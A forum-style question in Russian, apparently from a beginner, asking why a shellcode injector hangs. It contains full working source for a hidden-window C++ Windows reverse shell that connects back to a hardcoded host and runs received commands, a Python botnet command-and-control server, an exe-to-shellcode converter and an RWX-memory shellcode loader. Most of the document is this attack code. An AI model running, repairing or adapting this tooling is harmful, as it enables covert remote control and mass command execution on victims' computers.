Я создал обратную оболочку для окон, написанных на c ++, я также включил несколько команд из библиотеки windows.h. Обратная оболочка подключается обратно к ботнету, написанному на python. Я использую машину Linux для размещения ботнета и тестирую полезную нагрузку на виртуальной машине Windows 10 (все было скомпилировано на моей машине с Linux), все работает отлично, когда я компилирую файл cpp и запускаю его на моей машине с Windows. Теперь я хочу преобразовать файл cpp в шелл-код и выполнить его на компьютере с Windows, поэтому я сгенерировал шелл-код из файла payload.exe и написал другую программу на языке c ++ для инъекции шелл-кода в машину с Windows, но программа почему-то зависаети так как я очень новичок в этом типе вещей, я не могу понять, почему это так, или даже если я на правильном пути, я надеялся, что кто-то может пролить немного света. Все антивирусные сканеры и защитник Windows были отключены во время тестирования.
Payload.cpp
#include <winsock2.h> //Socket connection
#include <windows.h> //Used for WinApi calls
#include <ws2tcpip.h> //TCP-IP Sockets
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024
// Debug headers
// #include <iostream>
void exec(char* returnval, int returnsize, char *fileexec)
{
// std::cout << fileexec << std::endl;
if (32 >= (int)(ShellExecute(NULL,"open", fileexec, NULL, NULL, SW_HIDE))) //Get return value in int
{
strcat(returnval, "[x] Error executing command..\n");
}
else
{
strcat(returnval, "\n");
}
}
void whoami(char* returnval, int returnsize)
{
DWORD bufferlen = 257;
GetUserName(returnval, &bufferlen);
}
void hostname(char* returnval, int returnsize)
{
DWORD bufferlen = 257;
GetComputerName(returnval, &bufferlen);
}
void pwd(char* returnval, int returnsize) //Module 2
{
TCHAR tempvar[MAX_PATH];
GetCurrentDirectory(MAX_PATH, tempvar);
strcat(returnval, tempvar);
}
void RevShell()
{
WSADATA wsaver;
WSAStartup(MAKEWORD(2,2), &wsaver);
SOCKET tcpsock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
sockaddr_in addr;
addr.sin_family = AF_INET;
//ip to connect back to (HOST machine)
addr.sin_addr.s_addr = inet_addr("192.168.0.227");
addr.sin_port = htons(8080);
if(connect(tcpsock, (SOCKADDR*)&addr, sizeof(addr))==SOCKET_ERROR) {
closesocket(tcpsock);
WSACleanup();
exit(0);
}
else {
// std::cout << "[+] Connected to client. waiting for incoming command..." << std::endl;
char CommandReceived[DEFAULT_BUFLEN] = "";
while (true)
{
int Result = recv(tcpsock, CommandReceived, DEFAULT_BUFLEN, 0);
// std::cout << "Command received: " << CommandReceived;
// std::cout << "Length of Command received: " << Result << std::endl;
if ((strcmp(CommandReceived, "whoami") == 0)) {
char buffer[257] = "";
whoami(buffer,257);
strcat(buffer, "\n");
send(tcpsock, buffer, strlen(buffer)+1, 0);
memset(buffer, 0, sizeof(buffer));
memset(CommandReceived, 0, sizeof(CommandReceived));
}
else if ((strcmp(CommandReceived, "hostname") == 0)) {
char buffer[257] = "";
hostname(buffer,257);
strcat(buffer, "\n");
send(tcpsock, buffer, strlen(buffer)+1, 0);
memset(buffer, 0, sizeof(buffer));
memset(CommandReceived, 0, sizeof(CommandReceived));
}
else if ((strcmp(CommandReceived, "pwd") == 0)) {
char buffer[257] = "";
pwd(buffer,257);
strcat(buffer, "\n");
send(tcpsock, buffer, strlen(buffer)+1, 0);
memset(buffer, 0, sizeof(buffer));
memset(CommandReceived, 0, sizeof(CommandReceived));
}
else if ((strcmp(CommandReceived, "exit") == 0)) {
closesocket(tcpsock);
WSACleanup();
exit(0);
}
else {
char splitval[DEFAULT_BUFLEN] = "";
for(int i=0; i<(*(&CommandReceived + 1) - CommandReceived); ++i)
{
if (CommandReceived[i] == *" ") //CommandReceived[i] is a pointer here and can only be compared with a integer, this *" "
{
break;
}
else
{
splitval[i] = CommandReceived[i];
}
}
if ((strcmp(splitval, "exec") == 0)) {
char CommandExec[DEFAULT_BUFLEN] = "";
int j = 0;
for(int i=5; i<(*(&CommandReceived + 1) - CommandReceived); ++i)
{
CommandExec[j] = CommandReceived[i];
++j;
}
char buffer[257] = "";
exec(buffer, 257, CommandExec);
strcat(buffer, "\n");
send(tcpsock, buffer, strlen(buffer)+1, 0);
memset(buffer, 0, sizeof(buffer));
memset(CommandReceived, 0, sizeof(CommandReceived));
}
else {
char buffer[20] = "Invalid Command\n";
send(tcpsock, buffer, strlen(buffer)+1, 0);
memset(buffer, 0, sizeof(buffer));
memset(CommandReceived, 0, sizeof(CommandReceived));
}
}
}
}
closesocket(tcpsock);
WSACleanup();
exit(0);
}
int main()
{
HWND stealth;
AllocConsole();
stealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);
RevShell();
return 0;
}
Botnet.py
import socket
import sys
import os
import threading
import queue
import time
q = queue.Queue()
Socketthread = []
ClientList = {}
#-------------------------------------------------------------------------------------------
class BotHandler(threading.Thread):
def __init__(self, client, client_address, qv):
threading.Thread.__init__(self)
self.client = client
self.client_address = client_address
self.ip = client_address[0]
self.port = client_address[1]
self.q = qv
def run(self):
BotName = threading.current_thread().getName()
print("[*] Slave " + self.ip + ":" + str(self.port) + " connected with Thread-ID: ", BotName)
ClientList[BotName] = self.client_address
while True:
RecvBotCmd = self.q.get()
# print("\nReceived Command: " + RecvBotCmd + " for " + BotName)
try:
# RecvBotCmd += "\n"
self.client.send(RecvBotCmd.encode('utf-8'))
recvVal = (self.client.recv(1024)).decode('utf-8')
print(recvVal)
except Exception as ex:
# for t in Socketthread:
# if t.is_alive() == False:
# print("\n[!] Died Thread: " + str(t))
# t.join()
print(ex)
break
#-------------------------------------------------------------------------------------------
class BotCmd(threading.Thread):
def __init__(self, qv2):
threading.Thread.__init__(self)
self.q = qv2
def run(self):
while True:
SendCmd = str(input("BotCmd> "))
if (SendCmd == ""):
pass
elif (SendCmd == "exit"):
for i in range(len(Socketthread)):
time.sleep(0.1)
self.q.put(SendCmd)
time.sleep(5)
os._exit(0)
else:
print("[+] Sending Command: " + SendCmd + " to " + str(len(Socketthread)) + " bots")
for i in range(len(Socketthread)):
time.sleep(0.1)
self.q.put(SendCmd)
#-------------------------------------------------------------------------------------------
def listener(lhost, lport, q):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_address = (lhost, lport)
server.bind(server_address)
server.listen(10)
print ("[+] Starting Botnet listener on tcp://" + lhost + ":" + str(lport) + "\n")
BotCmdThread = BotCmd(q)
BotCmdThread.start()
while True:
(client, client_address) = server.accept() #start listening
newthread = BotHandler(client, client_address, q) #BotHandler = Multiconn
Socketthread.append(newthread)
newthread.start()
#-------------------------------------------------------------------------------------------
#import
def main():
if (len(sys.argv) < 3):
print ("[!] Usage:\n [+] python3 " + sys.argv[0] + " <LHOST> <LPORT>\n [+] Eg.: python3 " + sys.argv[0] + " 0.0.0.0 8080\n")
else:
try:
lhost = sys.argv[1]
lport = int(sys.argv[2])
listener(lhost, lport, q)
except Exception as ex:
print("\n[-] Unable to run the handler. Reason: " + str(ex) + "\n")
if __name__ == '__main__':
main()
Преобразует .exe в шелл-код
import sys, os
if len(sys.argv) < 2:
print 'usage: ' + sys.argv[0] + ' file.exe\n'
sys.exit(0)
shellcode = ''
bytes = 0
for b in open(sys.argv[1], 'rb').read():
shellcode += '\\x' + b.encode('hex')
bytes += 1
print 'Number of bytes for file ' + sys.argv[1] + ': ' + str(bytes) + '\n'
fp=open("shell.txt", "w")
fp.write(shellcode)
fp.close()
print "Done!"
cpp файл для ввода шелл-кода
#include "stdafx.h"
#include "Windows.h"
int main()
{
unsigned char shellcode[] =
"generated shellcode goes here";
void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}